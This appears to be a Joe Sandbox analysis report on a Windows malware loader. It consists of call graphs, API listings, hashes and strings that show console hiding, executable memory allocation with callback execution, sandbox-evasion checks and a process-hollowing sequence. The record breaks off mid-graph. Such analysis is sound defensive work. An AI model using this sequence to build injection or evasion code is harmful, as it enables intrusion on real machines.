__EH_prolog 18041->18043 18042 1ae41b 18042->18031 18043->18042 18044 1ad51f 49 API calls 18043->18044 18044->18042 18046 1abdd2 18045->18046 18049 1ade7e 18045->18049 18046->16922 18047 1ade6b 39 API calls 18047->18049 18048 1ae230 39 API calls 18048->18049 18049->18046 18049->18047 18049->18048 18050 1a11f8 39 API calls 18049->18050 18050->18049 18052 1b8ca5 ___scrt_uninitialize_crt 18051->18052 18053 1b8c93 18051->18053 18052->16099 18054 1b8ca1 18053->18054 18056 1b55da 18053->18056 18054->16099 18059 1b546b 18056->18059 18062 1b535f 18059->18062 18063 1b536b ___BuildCatchObject 18062->18063 18070 1b6866 EnterCriticalSection 18063->18070 18065 1b53e1 18079 1b53ff 18065->18079 18066 1b5375 ___scrt_uninitialize_crt 18066->18065 18071 1b52d3 18066->18071 18070->18066 18072 1b52df ___BuildCatchObject 18071->18072 18082 1b5cd0 EnterCriticalSection 18072->18082 18074 1b52e9 ___scrt_uninitialize_crt 18075 1b5322 18074->18075 18083 1b5575 18074->18083 18096 1b5353 18075->18096 18144 1b68ae LeaveCriticalSection 18079->18144 18081 1b53ed 18081->18054 18082->18074 18084 1b558a ___std_exception_copy 18083->18084 18085 1b559c 18084->18085 18086 1b5591 18084->18086 18088 1b550c ___scrt_uninitialize_crt 64 API calls 18085->18088 18087 1b546b ___scrt_uninitialize_crt 68 API calls 18086->18087 18089 1b5597 18087->18089 18090 1b55a6 18088->18090 18091 1b509f ___std_exception_copy 39 API calls 18089->18091 18090->18089 18093 1badbf ___scrt_uninitialize_crt 39 API calls 18090->18093 18092 1b55d4 18091->18092 18092->18075 18094 1b55bd 18093->18094 18099 1bb8fb 18094->18099 18143 1b5ce4 LeaveCriticalSection 18096->18143 18098 1b5341 18098->18066 18100 1bb919 18099->18100 18101 1bb90c 18099->18101 18103 1bb962 18100->18103 18105 1bb940 18100->18105 18102 1b6094 __dosmaperr 14 API calls 18101->18102 18107 1bb911 18102->18107 18104 1b6094 __dosmaperr 14 API calls 18103->18104 18106 1bb967 18104->18106 18110 1bb859 18105->18110 18109 1b5b05 ___std_exception_copy 39 API calls 18106->18109 18107->18089 18109->18107 18111 1bb865 ___BuildCatchObject 18110->18111 18123 1c2bc9 EnterCriticalSection 18111->18123 18113 1bb874 18122 1bb8b9 18113->18122 18124 1c2e45 18113->18124 18114 1b6094 __dosmaperr 14 API calls 18116 1bb8c0 18114->18116 18140 1bb8ef 18116->18140 18117 1bb8a0 FlushFileBuffers 18117->18116 18118 1bb8ac GetLastError 18117->18118 18137 1b6081 18118->18137 18122->18114 18123->18113 18125 1c2e67 18124->18125 18126 1c2e52 18124->18126 18129 1b6081 __dosmaperr 14 API calls 18125->18129 18131 1c2e8c 18125->18131 18127 1b6081 __dosmaperr 14 API calls 18126->18127 18128 1c2e57 18127->18128 18130 1b6094 __dosmaperr 14 API calls 18128->18130 18132 1c2e97 18129->18132 18135 1c2e5f 18130->18135 18131->18117 18133 1b6094 __dosmaperr 14 API calls 18132->18133 18134 1c2e9f 18133->18134 18136 1b5b05 ___std_exception_copy 39 API calls 18134->18136 18135->18117 18136->18135 18138 1bb4cd __dosmaperr 14 API calls 18137->18138 18139 1b6086 18138->18139 18139->18122 18141 1c2c7e __wsopen_s LeaveCriticalSection 18140->18141 18142 1bb8d8 18141->18142 18142->18107 18143->18098 18144->18081 18554 1b5c3e 18555 1b55da ___scrt_uninitialize_crt 68 API calls 18554->18555 18556 1b5c46 18555->18556 18564 1bd152 18556->18564 18558 1b5c4b 18559 1bc7e8 14 API calls 18558->18559 18560 1b5c5a DeleteCriticalSection 18559->18560 18560->18558 18561 1b5c75 18560->18561 18562 1b7805 ___vcrt_freefls@4 14 API calls 18561->18562 18563 1b5c80 18562->18563 18565 1bd15e ___BuildCatchObject 18564->18565 18574 1b6866 EnterCriticalSection 18565->18574 18567 1bd1d5 18575 1bd1f4 18567->18575 18570 1bd1a9 DeleteCriticalSection 18572 1b7805 ___vcrt_freefls@4 14 API calls 18570->18572 18571 1b575b 69 API calls 18573 1bd169 18571->18573 18572->18573 18573->18567 18573->18570 18573->18571 18574->18573 18578 1b68ae LeaveCriticalSection 18575->18578 18577 1bd1e1 18577->18558 18578->18577 19197 1bb243 19198 1bb24e 19197->19198 19202 1bb25e 19197->19202 19203 1bb264 19198->19203 19201 1b7805 ___vcrt_freefls@4 14 API calls 19201->19202 19204 1bb279 19203->19204 19205 1bb27f 19203->19205 19206 1b7805 ___vcrt_freefls@4 14 API calls 19204->19206 19207 1b7805 ___vcrt_freefls@4 14 API calls 19205->19207 19206->19205 19208 1bb28b 19207->19208 19209 1b7805 ___vcrt_freefls@4 14 API calls 19208->19209 19210 1bb296 19209->19210 19211 1b7805 ___vcrt_freefls@4 14 API calls 19210->19211 19212 1bb2a1 19211->19212 19213 1b7805 ___vcrt_freefls@4 14 API calls 19212->19213 19214 1bb2ac 19213->19214 19215 1b7805 ___vcrt_freefls@4 14 API calls 19214->19215 19216 1bb2b7 19215->19216 19217 1b7805 ___vcrt_freefls@4 14 API calls 19216->19217 19218 1bb2c2 19217->19218 19219 1b7805 ___vcrt_freefls@4 14 API calls 19218->19219 19220 1bb2cd 19219->19220 19221 1b7805 ___vcrt_freefls@4 14 API calls 19220->19221 19222 1bb2d8 19221->19222 19223 1b7805 ___vcrt_freefls@4 14 API calls 19222->19223 19224 1bb2e6 19223->19224 19229 1bb090 19224->19229 19230 1bb09c ___BuildCatchObject 19229->19230 19245 1b6866 EnterCriticalSection 19230->19245 19232 1bb0a6 19235 1b7805 ___vcrt_freefls@4 14 API calls 19232->19235 19236 1bb0d0 19232->19236 19235->19236 19246 1bb0ef 19236->19246 19237 1bb0fb 19238 1bb107 ___BuildCatchObject 19237->19238 19250 1b6866 EnterCriticalSection 19238->19250 19240 1bb111 19241 1bb331 __dosmaperr 14 API calls 19240->19241 19242 1bb124 19241->19242 19251 1bb144 19242->19251 19245->19232 19249 1b68ae LeaveCriticalSection 19246->19249 19248 1bb0dd 19248->19237 19249->19248 19250->19240 19254 1b68ae LeaveCriticalSection 19251->19254 19253 1bb132 19253->19201 19254->19253 18145 13808b7 18157 138005f GetPEB 18145->18157 18147 138092e 18158 1380838 18147->18158 18149 13809c9 18150 1380936 18150->18149 18151 13809e5 CreateFileW 18150->18151 18151->18149 18152 1380a0f VirtualAlloc ReadFile 18151->18152 18152->18149 18155 1380a3c 18152->18155 18153 1380a55 18155->18153 18156 1380d7c ExitProcess 18155->18156 18171 138020a 18155->18171 18157->18147 18186 138005f GetPEB 18158->18186 18160 138084c 18187 138005f GetPEB 18160->18187 18162 138085f 18188 138005f GetPEB 18162->18188 18164 1380872 18189 13807da 18164->18189 18166 1380880 18167 138089c VirtualAllocExNuma 18166->18167 18168 13808a9 18167->18168 18194 138073a 18168->18194 18201 138005f GetPEB 18171->18201 18173 13803b3 18173->18155 18174 13803c1 CreateProcessW 18175 13803f0 Wow64GetThreadContext 18174->18175 18178 13803eb 18174->18178 18176 1380410 ReadProcessMemory 18175->18176 18175->18178 18176->18178 18184 1380218 18176->18184 18178->18173 18229 1381136 18178->18229 18180 13812e5 11 API calls 18180->18184 18182 1380675 Wow64SetThreadContext 18182->18178 18182->18184 18184->18173 18184->18174 18184->18178 18184->18180 18184->18182 18185 1381136 11 API calls 18184->18185 18202 13811cb 18184->18202 18211 1380f84 18184->18211 18220 1381085 18184->18220 18185->18184 18186->18160 18187->18162 18188->18164 18199 138005f GetPEB 18189->18199 18191 13807ea 18192 13807f0 GetSystemInfo 18191->18192 18193 138081b 18192->18193 18193->18166 18200 138005f GetPEB 18194->18200 18196 1380746 18197 1380766 VirtualAlloc 18196->18197 18198 1380783 18197->18198 18198->18150 18199->18191 18200->18196 18201->18184 18203 13811e6 18202->18203 18238 138013e GetPEB 18203->18238 18205 1381207 18206 13812bf 18205->18206 18207 138120f 18205->18207 18255 1381611 18206->18255 18240 1380d85 18207->18240 18210 13812a6 18210->18184 18212 1380f9f 18211->18212 18213 138013e GetPEB 18212->18213 18214 1380fc0 18213->18214 18215 1380fc8 18214->18215 18216 1381052 18214->18216 18218 1380d85 10 API calls 18215->18218 18265 1381635 18216->18265 18219 1381039 18218->18219 18219->18184 18221 13810a0 18220->18221 18222 138013e GetPEB 18221->18222 18223 13810c1 18222->18223 18224 138110b 18223->18224 18225 13810c5 18223->18225 18268 1381647 18224->18268 18226 1380d85 10 API calls 18225->18226 18228 1381100 18226->18228 18228->18184 18230 1381149 18229->18230 18231 138013e GetPEB 18230->18231 18232 138116a 18231->18232 18233 138116e 18232->18233 18234 13811b4 18232->18234 18235 1380d85 10 API calls 18233->18235 18271 13815ff 18234->18271 18237 13811a9 18235->18237 18237->18173 18239 1380160 18238->18239 18239->18205 18258 138005f GetPEB 18240->18258 18242 1380dce 18259 1380109 GetPEB 18242->18259 18245 1380e5b 18246 1380e6c VirtualAlloc 18245->18246 18251 1380f30 18245->18251 18247 1380e82 ReadFile 18246->18247 18246->18251 18248 1380e97 VirtualAlloc 18247->18248 18247->18251 18248->18251 18252 1380eb8 18248->18252 18249 1380f79 18249->18210 18250 1380f6e VirtualFree 18250->18249 18251->18249 18251->18250 18252->18251 18253 1380f1f FindCloseChangeNotification 18252->18253 18254 1380f23 VirtualFree 18252->18254 18253->18254 18254->18251 18256 1380d85 10 API calls 18255->18256 18257 138161b 18256->18257 18257->18210 18258->18242 18260 138011c 18259->18260 18262 1380131 CreateFileW 18260->18262 18263 138017b GetPEB 18260->18263 18262->18245 18262->18251 18264 138019f 18263->18264 18264->18260 18266 1380d85 10 API calls 18265->18266 18267 138163f 18266->18267 18267->18219 18269 1380d85 10 API calls 18268->18269 18270 1381651 18269->18270 18270->18228 18272 1380d85 10 API calls 18271->18272 18273 1381609 18272->18273 18273->18237 20138 1b92e0 20141 1b8fac 20138->20141 20142 1b8fb8 ___BuildCatchObject 20141->20142 20149 1b6866 EnterCriticalSection 20142->20149 20144 1b8ff0 20150 1b900e 20144->20150 20146 1b8fc2 20146->20144 20148 1c3ec8 __Getctype 14 API calls 20146->20148 20148->20146 20149->20146 20153 1b68ae LeaveCriticalSection 20150->20153 20152 1b8ffc 20153->20152

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • LoadLibraryA.KERNEL32(Kernel32.dll,VirtualAlloc), ref: 001ABBEA
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 001ABBF1
                                                                                                                                                                  • GetConsoleWindow.KERNELBASE(00000000), ref: 001ABBFF
                                                                                                                                                                  • ShowWindow.USER32(00000000), ref: 001ABC06
                                                                                                                                                                    • Part of subcall function 001B681A: RtlAllocateHeap.NTDLL(00000000,00000016,?,?,00000003,001B5271,?,001B50D5,?,00000016,001B5A86), ref: 001B7362
                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,0000166E,00003000,00000040), ref: 001ABCB0
                                                                                                                                                                  • EnumSystemCodePagesW.KERNELBASE(?,00000000), ref: 001ABCDA
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  • Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Window$AddressAllocAllocateCodeConsoleEnumHeapLibraryLoadPagesProcShowSystemVirtual
                                                                                                                                                                  • String ID: $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $!$!$!$!$!$!$!$!$!$!$!$!$!$!$"$"$"$"$"$"$"$"$"$"$"$"$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$%$%$%$%$%$%$%$%$%$%$%$%$&$&$&$&$&$&$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$'$($($($($($($($($($($($($($($($($($($($($($)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$*$*$*$*$*$*$*$*$*$*$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$-$-$-$-$-$-$-$-$-$-$-$-$-$-$.$.$.$.$.$.$.$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$1$1$1$1$1$1$1$1$1$1$2$2$2$2$2$2$2$2$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$4$5$5$5$5$5$5$5$5$6$6$6$6$6$6$6$6$6$6$6$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$:$:$:$:$:$:$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$=$=$=$=$=$=$=$=$=$=$=$=$=$=$>$>$>$>$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$@$A$A$A$A$A$A$A$A$A$A$A$A$A$A$B$B$B$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$C$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$F$F$F$G$G$G$G$G$G$G$G$G$G$G$G$H$H$H$H$H$H$H$H$H$H$H$H$H$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$J$J$J$J$J$K$K$K$K$K$K$K$K$K$K$K$K$K$Kernel32.dll$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$M$M$M$M$M$M$N$N$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$P$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$R$R$R$R$R$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$U$U$U$U$U$U$U$U$U$U$U$U$U$V$VirtualAlloc$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$X$X$X$X$X$X$X$X$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Z$Z$Z$Z$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\xl\worksheets\sheet1.xml$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$^$^$^$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$`$`$`$`$`$`$`$`$`$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$b$b$b$b$b$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$f$f$f$f$f$f$f$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$path_for_modified_xlsx.xlsx$path_to_your_xlsx_file.xlsx$q$q$q$q$q$q$q$q$q$q$q$q$q$q$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$temp_unzipped$tglweuhzjposb$u$u$u$u$u$u$u$u$u$v$v$v$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$y$z$z$z$z$z${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${${$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$~$~$~
                                                                                                                                                                  • API String ID: 3670331875-3070636792
                                                                                                                                                                  • Opcode ID: 27cac773499105e9f57853fb87188759e947981e41935455e073382453142eda
                                                                                                                                                                  • Instruction ID: 80b196e3301c6f617ef10eb5312a62a60fe3387fd49c80abea5c15f15eedbe69
                                                                                                                                                                  • Opcode Fuzzy Hash: 27cac773499105e9f57853fb87188759e947981e41935455e073382453142eda
                                                                                                                                                                  • Instruction Fuzzy Hash: 95244910D0CBEAC8DB32C27C5C487CDAE611B63329F4843D991ED2A6D2C7B50B95DB66
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 217 13808b7-13809c7 call 138005f call 1380838 call 1380073 * 8 239 13809c9 217->239 240 13809ce-13809de 217->240 241 1380d81-1380d84 239->241 243 13809e0 240->243 244 13809e5-1380a08 CreateFileW 240->244 243->241 245 1380a0a 244->245 246 1380a0f-1380a35 VirtualAlloc ReadFile 244->246 245->241 247 1380a3c-1380a4f 246->247 248 1380a37 246->248 250 1380d6b-1380d7a call 138020a 247->250 251 1380a55-1380d66 247->251 248->241 254 1380d7c-1380d7e ExitProcess 250->254
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230484201.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1380000_xheuzyg.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AllocNumaVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4233825816-0
                                                                                                                                                                  • Opcode ID: a0f02da3e88e78e9f3bee9ec7e8fc8e01b4821cd0a3fab6beeb177d081184f1a
                                                                                                                                                                  • Instruction ID: 01b55f6f9a38f90b5a1353d42211703c146bacec4fc3da8d8cc3c125dd21992d
                                                                                                                                                                  • Opcode Fuzzy Hash: a0f02da3e88e78e9f3bee9ec7e8fc8e01b4821cd0a3fab6beeb177d081184f1a
                                                                                                                                                                  • Instruction Fuzzy Hash: 49F1A520D5D2D9ADDF06DBE994507FCBFB09F26201F0841DAE4E4F6282C17A834E9B25
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 315 13807da-1380820 call 138005f call 1380073 GetSystemInfo 321 1380829 315->321 322 1380822-1380825 315->322 323 138082b-138082e 321->323 322->323
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetSystemInfo.KERNELBASE(?), ref: 013807F7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230484201.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1380000_xheuzyg.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoSystem
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 31276548-0
                                                                                                                                                                  • Opcode ID: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                                                                                                                                                  • Instruction ID: 0778448e94a8de39ef5547028cb319713c51cbf3171b9ee1fc22c8e3782efd5f
                                                                                                                                                                  • Opcode Fuzzy Hash: fa2979548fe31277adddc85b40786a5f89b5b758f8f4ce622a53a7dd496667a7
                                                                                                                                                                  • Instruction Fuzzy Hash: FDF0A7B1D1420CAFDB0CF7FC88456BE7BACDB08104F104669F606E2640D534858542A0
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,?,?,?,?,0138161B,7FAB7E30), ref: 01380E4B
                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,0138161B,7FAB7E30,013812D9,00000000,00000040), ref: 01380E75
                                                                                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,0000000E,7FAB7E30,00000000,?,?,?,?,?,?,?,0138161B,7FAB7E30,013812D9,00000000), ref: 01380E8C
                                                                                                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?,?,?,?,?,?,?,0138161B,7FAB7E30,013812D9,00000000,00000040), ref: 01380EAE
                                                                                                                                                                  • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,0138161B,7FAB7E30,013812D9,00000000,00000040,?,00000000,0000000E), ref: 01380F20
                                                                                                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,0138161B,7FAB7E30,013812D9,00000000,00000040,?), ref: 01380F2B
                                                                                                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,?,?,?,?,?,?,?,0138161B,7FAB7E30,013812D9,00000000,00000040,?), ref: 01380F76
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.1230484201.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1380000_xheuzyg.jbxd
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Virtual$AllocFileFree$ChangeCloseCreateFindNotificationRead
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 656311269-0
                                                                                                                                                                  • Opcode ID: f8b5799f5dd2d69402dcff38aee1976536b354bb491624ba7028a71fd7e17a97
                                                                                                                                                                  • Instruction ID: f41a711a2d5bb8aeb547367d175489bdf53d56b1e8fcde756e7863384e4ad41a
                                                                                                                                                                  • Opcode Fuzzy Hash: f8b5799f5dd2d69402dcff38aee1976536b354bb491624ba7028a71fd7e17a97
                                                                                                                                                                  • Instruction Fuzzy Hash: F0519071E00319BBDB24AFB8CC44BAEBBB8AF58714F148515FA50F7280E7749909CB64
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                  • Executed
                                                                                                                                                                  • Not Executed
                                                                                                                                                                  control_flow_graph 98 138020a-1380225 call 138005f 101 1380228-138022c 98->101 102 138022e-1380242 101->102 103 1380244-1380251 101->103 102->101 104 1380254-1380258 103->104 105 138025a-138026e 104->105 106 1380270-138027d 104->106 105->104 107 1380280-1380284 106->107 108 138029c-138037a call 1380073 * 8 107->108 109 1380286-138029a 107->109 126 138037c-1380386 108->126 127 1380391 108->127 109->107 126->127 128 1380388-138038f 126->128 129 1380395-13803b1 127->129 128->129 131 13803ba 129->131 132 13803b3-13803b5 129->132 134 13803c1-13803e9 CreateProcessW 131->134 133 1380734-1380737 132->133 135 13803eb 134->135 136 13803f0-1380409 Wow64GetThreadContext 134->136 137 13806e8-13806ec 135->137 138 138040b 136->138 139 1380410-138042d ReadProcessMemory 136->139 142 13806ee-13806f2 137->142 143 1380731-1380733 137->143 138->137 140 138042f 139->140 141 1380434-138043d 139->141 140->137 144 138043f-138044e 141->144 145 1380464-1380483 call 13811cb 141->145 146 13806f4-13806ff 142->146 147 1380705-1380709 142->147 143->133 144->145 148 1380450-138045d call 1381136 144->148 160 138048a-13804ab call 13812e5 145->160 161 1380485 145->161 146->147 150 138070b 147->150 151 1380711-1380715 147->151 148->145 163 138045f 148->163 150->151 155 138071d-1380721 151->155 156 1380717 151->156 157 138072d-138072f 155->157 158 1380723-1380728 call 1381136 155->158 156->155 157->133 158->157 166 13804ad-13804b4 160->166 167 13804f0-1380510 call 13812e5 160->167 161->137 163->137 169 13804eb 166->169 170 13804b6-13804e2 call 13812e5 166->170 174 1380512 167->174 175 1380517-138052c call 13800da 167->175 169->137 176 13804e9 170->176 177 13804e4 170->177 174->137 180 1380535-138053f 175->180 176->167 177->137 181 1380571-1380575 180->181 182 1380541-138056f call 13800da 180->182 183 138057b-1380589 181->183 184 1380655-1380671 call 1380f84 181->184 182->180 183->184 187 138058f-138059d 183->187 192 1380673 184->192 193 1380675-1380696 Wow64SetThreadContext 184->193 187->184 190 13805a3-13805c3 187->190 194 13805c6-13805ca 190->194 192->137 195 1380698 193->195 196 138069a-13806a4 call 1381085 193->196 194->184 197 13805d0-13805e5 194->197 